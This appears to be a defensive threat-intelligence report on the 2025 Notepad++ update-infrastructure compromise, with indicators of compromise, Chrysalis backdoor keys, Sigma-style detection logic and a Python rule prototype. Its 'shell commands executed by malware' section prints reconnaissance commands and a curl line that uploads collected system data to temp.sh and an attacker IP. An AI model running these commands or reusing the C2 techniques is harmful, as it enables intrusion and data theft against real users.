Notepad++ Supply Chain Attack: Complete Threat Intelligence for Detection Engineering

  • February 3, 2026

A state-sponsored supply chain attack compromised Notepad++'s update infrastructure from June to December 2025, enabling the Chinese APT group Lotus Blossom (aka Billbug, Lotus Panda, Raspberry Typhoon) to deliver malicious payloads to targeted victims. The attackers deployed three distinct infection chains featuring rotating C2 infrastructure, a custom backdoor called Chrysalis, and multiple evasion techniques including DLL sideloading, ProShow vulnerability exploitation, and Microsoft Warbird abuse. This report provides comprehensive technical details for building Sigma/Delta detection rules.

Attack timeline and initial access vector

The compromise began in June 2025 when attackers breached Notepad++'s shared hosting provider, gaining the ability to intercept and redirect update traffic. Direct server access ended September 2, 2025, but the attackers retained internal service credentials until December 2, 2025. Active malicious payload deployment occurred from late July through late October 2025, targeting approximately a dozen machines belonging to government entities in the Philippines, financial institutions in El Salvador, IT service providers in Vietnam, and individuals across Southeast Asia and Australia.

The attack exploited insufficient update verification controls in the WinGUP updater (gup.exe). When targeted users requested updates, their traffic was selectively redirected to attacker-controlled servers serving trojanized NSIS installers. The legitimate notepad++.exe and GUP.exe binaries were not compromised; the attack occurred purely at the infrastructure level.


Three distinct infection chains with rotating infrastructure

Chain #1: ProShow exploitation (July–August 2025)

This chain deliberately avoided DLL sideloading, instead exploiting CVE-2012-10051, a stack-based buffer overflow in Photodex ProShow Producer, to evade EDR detection. The NSIS installer created %appdata%\ProShow\ and dropped legitimate ProShow files alongside a malicious file named load containing two shellcodes: a decoy at the start and the actual Metasploit downloader in the middle. When ProShow.exe launched, the buffer overflow triggered shellcode execution, which decrypted a Metasploit downloader that retrieved a Cobalt Strike beacon from https://45.77.31[.]210/users/admin or https://cdncheck.it[.]com/users/admin.

Chain #2: Lua interpreter abuse (September–October 2025)

A smaller ~140KB NSIS installer created %appdata%\Adobe\Scripts\ and dropped a legitimate Lua interpreter with a malicious alien.ini compiled script. The Lua script allocated executable memory and executed shellcode via the EnumWindowStationsW API callback, loading a Metasploit downloader that fetched Cobalt Strike beacons from https://safe-dns.it[.]com/help/Get-Start.

Chain #3: Chrysalis backdoor via DLL sideloading (October 2025)

The final chain deployed the custom Chrysalis backdoor using DLL sideloading. The NSIS installer created a hidden %appdata%\Bluetooth\ directory and dropped three files: BluetoothService.exe (a renamed Bitdefender Submission Wizard), log.dll (the malicious DLL), and BluetoothService (encrypted shellcode). When BluetoothService.exe loaded log.dll, it decrypted and executed the Chrysalis backdoor using a Linear Congruential Generator cipher with FNV-1a and MurmurHash-style finalizers.


Chrysalis backdoor: technical specifications for detection

Chrysalis is a feature-rich implant with 15 distinct commands supporting interactive shell access, file operations, and complete self-removal. Key technical characteristics:

Component                    Technical detail
Main module decryption       XOR+add+sub with key gQ2JR&9;
Configuration decryption     RC4 with key qwhvb^435h&*7
C2 communication encryption  RC4 with key vAuig34%^325hGV
API hashing                  FNV-1a (0x811C9DC5) + MurmurHash finalizer (0x85EBCA6B)
Mutex                        Global\Jdhfv_1.0.1
C2 URL format                /a/chat/s/{GUID} (mimics DeepSeek API)

Command tags and capabilities:

  • 4T: Interactive cmd.exe reverse shell
  • 4V: Create process (remote execution via CreateProcessW)
  • 4W/4X: Write file/chunk to disk
  • 4Y: Read and exfiltrate file data
  • 4\: Full self-removal and cleanup
  • 4_/4`/4a/4b: Drive enumeration, file enumeration, file deletion, directory creation
  • 4c/4d: Download/upload files from/to C2

Persistence mechanisms: the primary method creates a Windows Service; the fallback modifies registry Run keys. Command-line arguments control execution: no arguments triggers installation, -i spawns a new instance with -k, and -k executes the main C2 logic.


Complete indicators of compromise

Malicious update.exe hashes (SHA1)

Hash Chain Period
8e6e505438c21f3d281e1cc257abdbf7223b7f5a #1 Late July 2025
90e677d7ff5844407b9c073e3b7e896e078e11cd #1 Early August 2025
573549869e84544e3ef253bdba79851dcde4963a #2 Mid-September 2025
13179c8f19fbf3d8473c49983a199e6cb4f318f0 #2 Late September 2025
4c9aac447bf732acc97992290aa7a187b967ee2c #2 Late September 2025
821c0cafb2aab0f063ef7e313f64313fc81d46cd #2 Mid-October 2025
d7ffd7b588880cf61b603346a3557e7cce648c93 #3 October 2025

Chain #3 component hashes (SHA256)

File Hash
update.exe a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9
BluetoothService.exe 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924
BluetoothService 77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e
log.dll 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad
ConsoleApplication2.exe (Warbird loader) b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3

Auxiliary file hashes (SHA1)

File Hash Chain
load (exploit payload) 06a6a5a39193075734a32e0235bde0e979c27228 #1
alien.ini (Lua script) ca4b6fe0c69472cd3d63b212eb805b7f65710d33 #2
log.dll f7910d943a013eede24ac89d6388c1b98f8b3717 #3

Network infrastructure

Malicious update delivery servers:

45.76.155[.]202 (July-September 2025)
45.32.144[.]255 (October 2025)
95.179.213[.]0 (Late October 2025)

Cobalt Strike C2 servers:

45.77.31[.]210 (Chain #1)
61.4.102[.]97 (Chrysalis C2 - Malaysia)
59.110.7[.]32:8880 (Chain #2)
124.222.137[.]114:9999 (Chain #2)

C2 domains:

cdncheck.it[.]com - CS beacon download/C2
self-dns.it[.]com - System info upload
safe-dns.it[.]com - Metasploit downloader/CS C2
api.skycloudcenter[.]com - Chrysalis C2
api.wiresguard[.]com - CS beacon C2
temp[.]sh - Legitimate service abused for exfil

All malicious URLs

Update delivery URLs:

http://45.76.155[.]202/update/update.exe
http://45.32.144[.]255/update/update.exe
http://95.179.213[.]0/update/update.exe
http://95.179.213[.]0/update/install.exe
http://95.179.213[.]0/update/AutoUpdater.exe

System information upload:

http://45.76.155[.]202/list
https://self-dns.it[.]com/list
https://temp.sh/upload

Cobalt Strike beacon GET requests:

https://45.77.31[.]210/api/update/v1
https://cdncheck.it[.]com/api/update/v1
https://cdncheck.it[.]com/api/getInfo/v1
https://safe-dns.it[.]com/resolve
https://api.wiresguard[.]com/update/v1
https://api.wiresguard[.]com/api/getInfo/v1
http://59.110.7[.]32:8880/api/getBasicInfo/v1
http://124.222.137[.]114:9999/api/updateStatus/v1

Cobalt Strike beacon POST requests:

https://45.77.31[.]210/api/FileUpload/submit
https://cdncheck.it[.]com/api/Metadata/submit
https://cdncheck.it[.]com/api/FileUpload/submit
https://safe-dns.it[.]com/dns-query
https://api.wiresguard[.]com/api/FileUpload/submit
https://api.wiresguard[.]com/api/Info/submit
http://59.110.7[.]32:8880/api/Metadata/submit
http://124.222.137[.]114:9999/api/Info/submit

Chrysalis C2 URL:

https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821

File system artifacts and paths to monitor

Chain-specific directories

Chain Directory Attribute
#1 %appdata%\ProShow\ Normal
#2 %appdata%\Adobe\Scripts\ Normal
#3 %appdata%\Bluetooth\ HIDDEN
Secondary C:\ProgramData\USOShared\ Normal
NSIS temp %localappdata%\Temp\ns.tmp\ Normal

Key files to detect

%appdata%\ProShow\load                      # Exploit payload
%appdata%\ProShow\1.txt                     # System info output
%appdata%\Adobe\Scripts\alien.ini           # Malicious Lua script
%appdata%\Adobe\Scripts\a.txt               # System info output
%appdata%\Bluetooth\BluetoothService.exe    # DLL sideloading target
%appdata%\Bluetooth\BluetoothService        # Encrypted shellcode
%appdata%\Bluetooth\log.dll                 # Malicious DLL
C:\ProgramData\USOShared\svchost.exe        # Renamed Tiny C Compiler
C:\ProgramData\USOShared\conf.c             # Metasploit shellcode source
u.bat                                       # Self-deletion script

Shell commands executed by malware

Chain #1 reconnaissance:

cmd /c whoami&&tasklist > 1.txt
curl.exe -F "file=@1.txt" -s https://temp.sh/upload
curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202


Chain #2 reconnaissance (early version):

cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt

Chain #2 reconnaissance (later version):

cmd /c whoami >> a.txt
cmd /c tasklist >> a.txt
cmd /c systeminfo >> a.txt
cmd /c netstat -ano >> a.txt

Metasploit loader execution:

C:\ProgramData\USOShared\svchost.exe -nostdlib -run C:\ProgramData\USOShared\conf.c

Process parent-child relationships for detection

Critical execution chains:
notepad++.exe → gup.exe → update.exe (malicious NSIS installer)
gup.exe → cmd.exe → whoami/tasklist/systeminfo/netstat
update.exe → ProShow.exe → [shellcode execution]
update.exe → script.exe alien.ini (Lua execution)
update.exe → BluetoothService.exe → [log.dll sideload → Chrysalis]
svchost.exe -nostdlib -run conf.c → [Cobalt Strike beacon]
rundll32.exe (no arguments) → [Cobalt Strike indicator]

Detection logic for GUP.exe child processes:

ParentImage ends with "GUP.exe" AND 
Image NOT downloaded from ("notepad-plus-plus.org", "github.com")

MITRE ATT&CK technique mappings

Technique ID  Name                                                       Context
T1195.002     Supply Chain Compromise: Compromise Software Supply Chain  Update infrastructure hijacking
T1574.002     Hijack Execution Flow: DLL Side-Loading                    BluetoothService.exe + log.dll
T1203         Exploitation for Client Execution                          ProShow CVE-2012-10051
T1059.003     Windows Command Shell                                      Reconnaissance commands
T1082         System Information Discovery                               whoami, systeminfo
T1057         Process Discovery                                          tasklist
T1016         System Network Configuration Discovery                     netstat -ano
T1543.003     Windows Service                                            Chrysalis persistence
T1547.001     Registry Run Keys                                          Fallback persistence
T1071.001     Application Layer Protocol: Web Protocols                  HTTPS C2
T1041         Exfiltration Over C2 Channel                               Data upload via POST
T1140         Deobfuscate/Decode Files                                   Encrypted shellcode
T1027         Obfuscated Files                                           API hashing, custom encryption
T1036         Masquerading                                               Renamed Bitdefender binary

Detection opportunities by log source

Sysmon events

Event ID  Detection use case
1         GUP.exe spawning unexpected child processes; reconnaissance command execution
3         GUP.exe network connections to non-standard domains; unusual outbound from %AppData% executables
7         log.dll loading from %AppData%\Bluetooth; unsigned DLLs in signed processes
11        File creation in %localappdata%\Temp\ns.tmp, hidden %AppData% directories
13        Registry Run key modifications for persistence
17        Cobalt Strike named pipes (MSSE-####-server, msagent_##, postex_*)
22        DNS queries to temp[.]sh, C2 domains

Windows Security Event Log

Event ID  Detection use case
4688 Process creation with command line capturing reconnaissance commands
4624 Logon events associated with lateral movement
7045 New service installation (Chrysalis persistence)

Web proxy/firewall detection

High-priority indicators:

  • HTTP requests with temp[.]sh URLs embedded in User-Agent header
  • DNS queries to temp[.]sh from corporate endpoints
  • Traffic to C2 domains: cdncheck.it[.]com, safe-dns.it[.]com, api.skycloudcenter[.]com, api.wiresguard[.]com
  • Connections to non-standard ports: 8880, 9999
  • POST requests to /api/FileUpload/submit, /api/Metadata/submit, /dns-query
  • URL patterns mimicking DeepSeek API: /a/chat/s/{GUID}

User-Agent strings observed:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4044.92 Safari/537.36
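To make the GUP.exe child-process logic, the Cobalt Strike named-pipe patterns and the proxy indicators above testable, here is an added Python prototype (not code from this post or from any vendor) that runs those rules over constructed sample events. It assumes that a benign GUP.exe child is the official installer, named npp.<version>.Installer*.exe, and reduces Sysmon and proxy records to the few fields the rules need.

```python
import re

# Constructed sample telemetry (not from the post): Sysmon-style process and
# named-pipe events plus proxy records, reduced to the fields the rules need.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\nsa1B2.tmp\update.exe", "cmdline": "update.exe"},
    {"type": "process", "parent": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c whoami&&tasklist > 1.txt"},
    {"type": "process", "parent": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\npp.8.8.6.Installer.x64.exe", "cmdline": ""},
    {"type": "pipe", "pipe": r"\MSSE-4412-server"},
    {"type": "pipe", "pipe": r"\mojo.5688.8052.183894939787"},
    {"type": "http", "method": "GET", "host": "45.76.155.202", "path": "/",
     "ua": "https://temp.sh/ZMRKV/1.txt"},
    {"type": "http", "method": "POST", "host": "api.skycloudcenter.com", "ua": "Mozilla/5.0",
     "path": "/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821"},
]

# Assumption: the only benign GUP.exe child is the official installer, npp.<version>.Installer*.exe.
LEGIT_INSTALLER = re.compile(r"^npp\..*installer.*\.exe$", re.I)
# Reconnaissance commands redirected into the 1.txt / a.txt files seen in chains #1 and #2.
RECON = re.compile(r"\b(whoami|tasklist|systeminfo|netstat\s+-ano)\b.*>+\s*[1a]\.txt", re.I)
CS_PIPE = re.compile(r"^\\(MSSE-\d+-server|msagent_[0-9a-f]{2}|postex_.+)$", re.I)
CHRYSALIS_URL = re.compile(r"^/a/chat/s/[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
CS_POST_PATHS = {"/api/FileUpload/submit", "/api/Metadata/submit", "/dns-query", "/api/Info/submit"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]

def evaluate(events):
    """Return (rule_name, event_index) pairs for every event matching a rule."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            child = basename(ev["image"])
            if basename(ev["parent"]).lower() == "gup.exe" and not LEGIT_INSTALLER.match(child):
                hits.append(("gup_unexpected_child", i))
            if RECON.search(ev.get("cmdline", "")):
                hits.append(("recon_to_txt", i))
        elif ev["type"] == "pipe" and CS_PIPE.match(ev["pipe"]):
            hits.append(("cobalt_strike_pipe", i))
        elif ev["type"] == "http":
            if "temp.sh" in ev.get("ua", "").lower():
                hits.append(("tempsh_in_user_agent", i))
            if CHRYSALIS_URL.match(ev["path"]):
                hits.append(("chrysalis_c2_url", i))
            if ev.get("method") == "POST" and ev["path"] in CS_POST_PATHS:
                hits.append(("cobalt_strike_post_path", i))
    return hits

for rule, idx in evaluate(SAMPLE_EVENTS):
    print(f"{rule:22} event {idx}: {SAMPLE_EVENTS[idx]}")
```

The installer-name allowlist is the part most likely to need tuning in a real environment; widen it only after confirming what GUP.exe legitimately spawns on your hosts.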